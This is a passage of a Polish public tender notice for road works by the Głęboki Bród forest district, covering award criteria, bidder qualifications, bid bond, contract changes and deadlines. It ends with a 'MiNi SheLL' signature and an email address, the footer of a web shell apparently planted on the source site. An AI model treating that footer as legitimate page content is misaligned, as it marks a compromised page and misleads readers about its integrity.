kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Sytuacja ekonomiczna i finansowa<br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i<br/>finansowej.<br/>W zakresie warunku dotyczącego sytuacji ekonomicznej i finansowej, Zamawiający wymaga, aby Wykonawca wykazał<br/>posiadanie środków finansowych lub zdolność kredytową na kwotę nie mniejszą niż 200 000,00 zł (słownie: dwieście tysięcy<br/>zł) w okresie nie wcześniejszym niż 3 miesiące przed upływem terminu składania ofert.<br/>Wykonawca w ramach niniejszego warunku zobowiązany jest również wykazać, że jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż<br/>300 000,00 zł.<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.<br/>Zdolność techniczna lub zawodowa<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności<br/>technicznej lub zawodowej.<br/>1) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w<br/>tym okresie, wykonał należycie co najmniej jedną robotę budowlaną odpowiadającą swoim rodzajem robotom budowlanym<br/>stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 300 000,00 zł brutto, (słownie złotych: trzysta tysięcy zł).<br/>Zamawiający nie dopuszcza sumowania wartości kilku robót o mniejszym zakresie w celu spełnienia tego warunku udziału w<br/>postępowaniu<br/>2) dysponuje lub będzie dysponować jedną osobą odpowiedzialną za kierowanie robotami budowlanymi posiadającą<br/>uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń i posiadającą minimum<br/>dwuletnie doświadczenie (licząc od dnia nabycia uprawnień) w kierowaniu robotami drogowymi jako kierownik budowy albo<br/>kierownik robót.<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z KRS<br/>lub CEIDG<br/>Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>dokumenty podmiotów zagranicznych<br/>Dokument potwierdzający, że nie otwarto likwidacji wykonawcy<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast &#34;Odpisu lub informacji<br/>z KRS lub CEIDG&#34; składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju<br/>sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej<br/>niż 3 miesiące przed ich złożeniem.<br/>Dokumenty podmiotów zagranicznych:<br/>Dokument potwierdzający, że nie otwarto likwidacji wykonawcy<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast &#34;Odpisu lub informacji z KRS lub CEIDG&#34; składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Ubezpieczenie od odpowiedzialności cywilnej<br/>Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej<br/>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych<br/>lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego (kierownik robót budowlanych)<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami.<br/>Wzór wykazu stanowi zał. nr 5 do SWZ<br/>Wykaz robót budowanych<br/>Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi<br/>Wykonawcami, wykaz robót budowlanych dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio<br/>uczestniczył.<br/>Wzór wykazu stanowi zał. nr 6 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie wykonawcy o braku podstaw wykluczenia w zakresie art. 5k<br/>Oświadczenie Wykonawcy o braku podstaw wykluczenia w zakresie, o którym mowa w art. 5k rozporządzenia Rady (UE) Nr<br/>833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi<br/>sytuację na Ukrainie (Dz. Urz. UE nr L 229 z 31.7.2014, str. 1 z późn. zm.)<br/>Wzór oświadczenia stanowi załącznik nr 3 do SWZ,<br/>Zobowiązanie podmiotu udostępniającego zasoby<br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie składa (wraz z ofertą) wykonawca, który w celu wykazania spełniania warunków udziału w postępowaniu<br/>polega na zdolnościach podmiotu udostępniającego zasoby.<br/>Wzór zobowiązania stanowi załącznik nr 4 do SWZ<br/>Pełnomocnictwo do złożenia oferty<br/>Jeżeli umocowanie osób podpisujących ofertę nie wynika z dokumentów rejestrowych, wykonawca do oferty powinien<br/>dołączyć dokument pełnomocnictwa udzielonego przez osoby uprawnione i obejmujące swym zakresem umocowanie do<br/>złożenia oferty lub do złożenia oferty i podpisania umowy. Pełnomocnictwo powinno zostać złożone w formie elektronicznej<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym albo w elektronicznej kopii dokumentu<br/>poświadczonej notarialnie za zgodność z oryginałem przy użyciu kwalifikowanego podpisu elektronicznego<br/>Do oferty należy dołączyć kosztorys ofertowy sporządzony zgodnie z wzorem znajdującym się w załączniku nr 9 do<br/>niniejszej SWZ, do oferty należy dołączyć pozostałe dokumenty określone w punkcie 9.1 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 9 000,00 PLN (słownie: dziewięć tysięcy, 00/100<br/>PLN).<br/>Wadium musi zostać wniesione przed upływem terminu składania ofert, tj. do dnia 2024.10.16 do godz. 10:00, według<br/>wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2024r. poz. 419).<br/>Wadium musi obejmować pełen okres związania ofertą tj. do dnia 2024.11.29<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: PKO BP S.A.<br/>O/Suwałki 37 1020 1332 0000 1002 0190 2378 (w tytule przelewu zaleca się wpisać nazwę i sygnaturę postępowania).<br/>Wadium musi wpłynąć na wskazany rachunek bankowy najpóźniej przed upływem terminu składania ofert (decyduje data<br/>wpływu na rachunek bankowy Zamawiającego).<br/>Wadium wnoszone w formie poręczeń lub gwarancji należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji oraz<br/>powinno zawierać:<br/>a) wskazanie Beneficjenta (Zamawiającego) poręczenia lub gwarancji, którym musi być Nadleśnictwo Głęboki Bród, Głęboki<br/>Bród 4 , 16-506 Giby;<br/>b) nazwę i adres siedziby Wykonawcy;<br/>c) kwotę i termin ważności gwarancji/poręczenia;<br/>d) bezwarunkowe zobowiązanie wystawcy poręczenia lub gwarancji do zapłaty kwoty wadium, na pierwsze pisemne<br/>żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>Zamawiający zwróci wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp.<br/>W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>Zamawiający zatrzyma wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub<br/>poręczenia, wystąpi odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, w przypadkach określonych w<br/>art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do<br/>ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1) postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu<br/>wykluczeniu oraz spełnianiu warunków udziału”, i &#34;Oświadczenie wykonawcy o braku podstaw wykluczenia w zakresie art.<br/>5k&#34;, o których mowa w pkt. 9.1 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia<br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z wzorem umowy, który stanowi załącznik nr 7 do niniejszej SWZ możliwe<br/>będą zmiany umowy w określonych poniżej przypadkach:<br/>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do<br/>umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 454, 455 Prawa<br/>zamówień publicznych.<br/>2. Zmiany umowy mogą nastąpić w zakresie zmiany wynagrodzenia Wykonawcy w szczególności w przypadku: ustawowej<br/>zmiany stawki podatku VAT.<br/>3.Strony przewidują możliwość wprowadzenia zmian w zawartej umowie w zakresie powierzenia wykonania robót<br/>dodatkowych, o których mowa w § 1 ust. 4, jeżeli będą one niezbędne do prawidłowego wykonania przedmiotu umowy. W<br/>przypadku, gdy z wprowadzeniem zmian w zawartej umowie w zakresie powierzenia wykonania robót dodatkowych, będzie się wiązać zmiana terminu wykonania przedmiotu umowy, zostanie ona dokonana zgodnie z ust. 5 pkt 1). Wynagrodzenie<br/>za roboty dodatkowe zostanie ustalone w aneksie do umowy zgodnie z § 1 ust. 4.<br/>4. Strony mają prawo do zmiany terminu wykonania umowy o okres trwania przyczyn, z powodu których będzie zagrożone<br/>dotrzymanie terminu zakończenia robót, w następujących sytuacjach:<br/>1) gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót w szczególności z<br/>powodu technologii realizacji prac określonych umową, normami lub innymi przepisami wymagającymi odpowiednich<br/>warunków, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi<br/>odpowiedzialność. Za niekorzystne warunki atmosferyczne należy rozumieć intensywne opady deszczu, śniegu lub gradu<br/>utrzymujące się co najmniej przez 5 dni (potwierdzone wpisem w dzienniku przez inspektora nadzoru), powodujące<br/>rozmiękczenie gruntu i konieczność przerwania robót;<br/>2) gdy nastąpi konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;<br/>3) gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są<br/>zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym<br/>ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;<br/>4) jeżeli wystąpi brak możliwości wykonywania robót z powodu niedopuszczania do ich wykonywania przez uprawniony<br/>organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy;<br/>5) w przypadku wstrzymania robót przez Zamawiającego na jego wyraźne żądanie, lub innych okoliczności leżących po<br/>stronie Zamawiającego;<br/>6) wystąpienia siły wyższej (powódź, huragan, trzęsienie ziemi, uderzenia pioruna, gradobicie, tąpnięcia górnicze, epidemie,<br/>pożary, wojna, zamieszki krajowe, strajki, odnalezienie niewypałów, niewybuchów lub wykopalisk archeologicznych)<br/>uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami;<br/>5. Warunki wprowadzenia zmian:<br/>1) wszelkie zmiany umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie<br/>pisemnej w drodze aneksu do Umowy, pod rygorem nieważności.<br/>2) zmiana podwykonawców, kierownika budowy i inspektora nadzoru nie wymaga zmiany w umowie w drodze aneksu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem Platformy e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-31 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę, osób wykonujących<br/>następujące czynności wchodzące w skład przedmiotu zamówienia: zagęszczanie nasypów z gruntu sypkiego, jeżeli<br/>wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.<br/>- Kodeks pracy (tekst jedn.: Dz. U. z 2022 r. poz. 1710 z późn. zm.). Sposób weryfikacji zatrudnienia tych osób, uprawnienia<br/>zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań związanych z zatrudnianiem tych osób oraz<br/>sankcje z tytułu niespełnienia ww. wymagań zostały opisane we wzorze umowy, stanowiącym załącznik nr 7 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com